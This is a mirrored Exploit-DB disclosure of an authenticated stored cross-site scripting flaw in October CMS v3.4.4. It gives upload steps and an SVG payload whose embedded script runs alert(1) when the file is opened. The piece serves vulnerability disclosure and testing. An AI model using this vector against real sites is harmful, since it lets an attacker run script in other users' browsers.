1
[webapps] October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
source link: https://www.exploit-db.com/exploits/51630
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 29 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE : N/A
# Proof of Concept:
1– Install the system through the website and log in with any user with file upload authority.
2– Select "Media" in the top menu. Prepare an SVG file using the payload below.
3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.
#Stored XSS Payload:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(1);
</script>
</svg>
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK